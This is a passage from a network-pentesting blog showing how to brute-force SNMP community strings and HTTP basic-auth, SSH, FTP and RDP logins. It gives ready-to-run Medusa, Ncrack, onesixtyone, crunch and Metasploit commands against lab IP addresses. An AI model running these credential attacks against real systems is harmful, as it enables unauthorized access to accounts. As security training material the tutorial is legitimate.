<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKT1Zdg7hxipQiLZalq8YdBA-IW9IGBOCEDRAsrWwSoIh-iS9EpC4hZdEXoXmWuoN6T8Hywph3v0qdjVRnjHS96_ReiuGQ4wsxs-2JMQQMpfr9JspZuGZX5Q9MnCYx6-rOxnOoEuAj3gE/s1600/Screen+Shot+2017-04-09+at+10.17.53+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKT1Zdg7hxipQiLZalq8YdBA-IW9IGBOCEDRAsrWwSoIh-iS9EpC4hZdEXoXmWuoN6T8Hywph3v0qdjVRnjHS96_ReiuGQ4wsxs-2JMQQMpfr9JspZuGZX5Q9MnCYx6-rOxnOoEuAj3gE/s640/Screen+Shot+2017-04-09+at+10.17.53+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4EHMiX1pFOINkGOT2ZYC6RjPtoAPoaq_AHZBq5nzrg-4CoimKejWc0A4EQdCuQEOKdbIihCf6fmK6uZUnZZrkbqwwMZtF98Syo95XredqaOoIB81ymcIxth6twPHs9qzl8Tbkcj16Qv4/s1600/Screen+Shot+2017-04-09+at+10.17.43+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4EHMiX1pFOINkGOT2ZYC6RjPtoAPoaq_AHZBq5nzrg-4CoimKejWc0A4EQdCuQEOKdbIihCf6fmK6uZUnZZrkbqwwMZtF98Syo95XredqaOoIB81ymcIxth6twPHs9qzl8Tbkcj16Qv4/s640/Screen+Shot+2017-04-09+at+10.17.43+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";"><br /></span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
And yes, Medusa found the valid community strings as "mike".</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>C ) onesixtyone</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>onesixtyone -c password 192.168.131.135</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
Onesoxtyone tool which also try to guess/crack the SNMP Community Strings using dictionary based attempts.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
As we can see below, It have identified that "mike" is valid Community Strings.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1d8vGG-OBIfDIq082iNe-1dX2yg_UPGmAFOlgDnGXtUKohyphenhyphenYaGduZFWzsL04s5DvEqTKThw6SVLyy7k_GdIx7qXCIiIb135yG5DqM0cPSeSi2tqkAQH_luPnwEgA9h11uAOdxrTwGzQ/s1600/Screen+Shot+2017-04-09+at+11.31.36+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1d8vGG-OBIfDIq082iNe-1dX2yg_UPGmAFOlgDnGXtUKohyphenhyphenYaGduZFWzsL04s5DvEqTKThw6SVLyy7k_GdIx7qXCIiIb135yG5DqM0cPSeSi2tqkAQH_luPnwEgA9h11uAOdxrTwGzQ/s640/Screen+Shot+2017-04-09+at+11.31.36+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
In next <a href="http://www.websecgeeks.com/2017/04/hacking-snmp-service-part-2-post.html" target="_blank">post</a>, we will see how we can use SNMP for Post Exploitation.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div style="color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
</div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com1tag:blogger.com,1999:blog-3462277729309057123.post-13732783809930345792017-04-09T23:51:00.000+05:302017-04-11T16:37:49.156+05:30Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLDArNF5QAyDm1ELcFy_cg1jntIhgFRSWDWXp9HL8oZcZMnJJ-lM6ReQ6Gx89y_ATKxnKGxI0W7l6N8azOTsjZKh2pjtb5QLl9IQmCJsd-yAu9SJ7GXkM8JUP-JbCKxxxMB5z_lonJ8Tg/s1600/405.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLDArNF5QAyDm1ELcFy_cg1jntIhgFRSWDWXp9HL8oZcZMnJJ-lM6ReQ6Gx89y_ATKxnKGxI0W7l6N8azOTsjZKh2pjtb5QLl9IQmCJsd-yAu9SJ7GXkM8JUP-JbCKxxxMB5z_lonJ8Tg/s320/405.jpeg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting</h2>
<div class="separator" style="clear: both; text-align: left;">
Apart from using Default Credentials, we can also perform a brute force attack on various services to get into them.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>1) HTTP (</b>htaccess protected web directory) </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Medusa comes in rescue when we talk about Basic Authorization or Password Protected Web Directory Cracking</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Medusa commmand line to For Cracking Basic Authorization or Password Protected Web Directory</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>medusa -h 192.168.11.219 -u admin -P Desktop/demo/password -M http -m
DIR:/secret-T 10</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Medusa will go ahead and try Crack Password Protected Web Directory by using <b>user </b>as admin and <b>password </b>as provide in password list on <b>Password Protected Web Directory </b>secret. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: left;">
<b>2) SSH</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Ncrack comes very handy when we talk about SSH Password Cracking, We can crack SSH password using Ncrack</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b>A) ncrack -p 22 --user admin -P Desktop/demo/password 192.168.131.135</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyS7rT41dD5pcP5R6CYbNF0nRcdqLqmCUPRohOZ4D6Ret_pHRAoOd1YB0VFOmucR3srS_1196dPN1L9zEOOLFKW6esvALjMKfztw7UymQMvOExJSWyu6hn6hKupwD_h3uOkfMwFPf2XcI/s1600/Screen+Shot+2017-04-09+at+6.15.58+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyS7rT41dD5pcP5R6CYbNF0nRcdqLqmCUPRohOZ4D6Ret_pHRAoOd1YB0VFOmucR3srS_1196dPN1L9zEOOLFKW6esvALjMKfztw7UymQMvOExJSWyu6hn6hKupwD_h3uOkfMwFPf2XcI/s640/Screen+Shot+2017-04-09+at+6.15.58+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b>Note - We can use crunch to create a wordlist for cracking password.</b></div>
<div class="separator" style="clear: both;">
<b>command format would be : </b>crunch <minpass> <maxass> words > outfile</div>
<div class="separator" style="clear: both;">
<b>command</b> : crunch 4 4 abcd123 > password</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<b>B) Metasploit:</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
We can also use Metasploit to Crack SSH password.</div>
<div class="separator" style="clear: both;">
Using <b>auxiliary/scanner/ssh/ssh_login</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqn5WkOFYyjXXPPIomCeGC9gz9slczBx64_0Okgk2uVldwMOEhiCeEUKcVbWE7f714oJ0W-nx3ZVSYTZR6Jl3PLEW1DtqZqmYY4OaB6h_mQLdKkacjDUdoxJotPdpLDeDY8tbvLsZy7yQ/s1600/Screen+Shot+2017-04-09+at+6.23.53+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqn5WkOFYyjXXPPIomCeGC9gz9slczBx64_0Okgk2uVldwMOEhiCeEUKcVbWE7f714oJ0W-nx3ZVSYTZR6Jl3PLEW1DtqZqmYY4OaB6h_mQLdKkacjDUdoxJotPdpLDeDY8tbvLsZy7yQ/s640/Screen+Shot+2017-04-09+at+6.23.53+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
Set required details following by <b>SET PARAMETERNAME. </b>After setting required thing run/exploit</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRkCUXbZe89FA8bnYRgawAu3O7mhai7HTGE8XCsVLDxpCkyNcrq65tBdYoSip9tL4iDSl-lwNm_by_g8ZPT4H7SwGjDG0zVl67xJglfJJSwe4H3O8mCCZuLm-YzmPDC81FwTF0glFQbjc/s1600/Screen+Shot+2017-04-09+at+6.28.42+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRkCUXbZe89FA8bnYRgawAu3O7mhai7HTGE8XCsVLDxpCkyNcrq65tBdYoSip9tL4iDSl-lwNm_by_g8ZPT4H7SwGjDG0zVl67xJglfJJSwe4H3O8mCCZuLm-YzmPDC81FwTF0glFQbjc/s640/Screen+Shot+2017-04-09+at+6.28.42+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEttv67v-TY9EHBX7H1ptk6nCQaLgR4nOp8HtT5jBxy8eTOzGSBRuYhsAjOm-ASwrW2ddJpMk5tXaVGa4HNhTdIjwOy5zK78ELrZvmThc9-vYXgaylhTdyelSEX2pJTFf1An5yQ6cqhck/s1600/Screen+Shot+2017-04-09+at+6.29.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEttv67v-TY9EHBX7H1ptk6nCQaLgR4nOp8HtT5jBxy8eTOzGSBRuYhsAjOm-ASwrW2ddJpMk5tXaVGa4HNhTdIjwOy5zK78ELrZvmThc9-vYXgaylhTdyelSEX2pJTFf1An5yQ6cqhck/s640/Screen+Shot+2017-04-09+at+6.29.00+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Metasploit cracked the password.<br />
<br />
<br />
<b>D) Medusa</b><br />
<b><br /></b>
We can achieve the Same Goal Using Medusa.<br />
<br />
<b>medusa -h 192.168.131.135 -u admin -P Desktop/demo/password -M ssh</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju3ym_Uu4hscxuT09qFYGciynlR8J0DLTqwGsaZ_CW_6AhXuaHGnezOIpbtigye83_0OB7bko67mdyIYojyj2SaUTZ8GJ9OVoKWa7S7NO8Y0crgFS5yBHSaOdQU3hNHIxlyRiJC067O4k/s1600/Screen+Shot+2017-04-09+at+6.36.44+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju3ym_Uu4hscxuT09qFYGciynlR8J0DLTqwGsaZ_CW_6AhXuaHGnezOIpbtigye83_0OB7bko67mdyIYojyj2SaUTZ8GJ9OVoKWa7S7NO8Y0crgFS5yBHSaOdQU3hNHIxlyRiJC067O4k/s640/Screen+Shot+2017-04-09+at+6.36.44+PM.png" width="640" /></a></div>
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX45D5e4D2dVNVPEk9fnod_r5BEFEBf0ywNvph-PnnDIrm7EBHAr-WmmUBUaFmHnQGs6ySBDtE5XdxjawPnnwjSyjgK7l5SY8sFmuIX9Rr3K-HbLKw9RsFNASMXBXKcHpOo7WtATD-RmI/s1600/Screen+Shot+2017-04-09+at+6.37.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX45D5e4D2dVNVPEk9fnod_r5BEFEBf0ywNvph-PnnDIrm7EBHAr-WmmUBUaFmHnQGs6ySBDtE5XdxjawPnnwjSyjgK7l5SY8sFmuIX9Rr3K-HbLKw9RsFNASMXBXKcHpOo7WtATD-RmI/s640/Screen+Shot+2017-04-09+at+6.37.00+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Medusa, were successfully able to crack SSH Password.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>3) FTP</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>A) Ncrack</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
To Crack FTP Password, we can use Ncrack also.</div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b>ncrack -p 21 --user admin -P Desktop/demo/password 192.168.0.7 -vv</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
This time our target machine is : 192.168.0.7</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihk8wuqJsIoUEedwfNj3Xf1G_naVmSgVCkI-gWh9dAuPZ8oGivxmDptEpeiFCrWDsgtkcwwcTQvPuNxuCGLgh0vzHpoq6v6VukcNqMj43CC7VPeA1-RciJH7AzeMoMFHNVy31asQ1UoYw/s1600/Screen+Shot+2017-04-09+at+9.50.41+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihk8wuqJsIoUEedwfNj3Xf1G_naVmSgVCkI-gWh9dAuPZ8oGivxmDptEpeiFCrWDsgtkcwwcTQvPuNxuCGLgh0vzHpoq6v6VukcNqMj43CC7VPeA1-RciJH7AzeMoMFHNVy31asQ1UoYw/s640/Screen+Shot+2017-04-09+at+9.50.41+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div>
<b>B ) Metasploit</b></div>
<div>
<b><br /></b></div>
<div>
There is an auxiliary for Cracking FTP in metasploit</div>
<div>
<br /></div>
<div>
<b>auxiliary/scanner/ftp/ftp_login</b><br />
<b><br /></b><b>4) RDP (Remote Desktop Protocol)</b><br />
<b><br /></b>
<b>ncrack -u rdp -P Desktop/demo/password.txt -p rdp 192.168.131.137</b><br />
<b><br /></b>
Ncrack successfully found the valid password as user "rdp" and password "rdppass".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSqPXJsFFbKeql0vvb4tEEnUmk8DWhwA6aBfLFexR-d3PHvZEEwVPIDvfy8wHwLt-j6p9hh4bkQochmtApF0z86yXpSJFHIqoHOTkd1ErHI9IGUroKjvwJsBkDZ4KBxgxlwVZ5l6Ogr_Y/s1600/Screen+Shot+2017-04-10+at+12.21.05+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSqPXJsFFbKeql0vvb4tEEnUmk8DWhwA6aBfLFexR-d3PHvZEEwVPIDvfy8wHwLt-j6p9hh4bkQochmtApF0z86yXpSJFHIqoHOTkd1ErHI9IGUroKjvwJsBkDZ4KBxgxlwVZ5l6Ogr_Y/s640/Screen+Shot+2017-04-10+at+12.21.05+AM.png" width="640" /></a></div>
<br />
<b><br /></b>
<b><br /></b>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
<div style="text-align: center;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0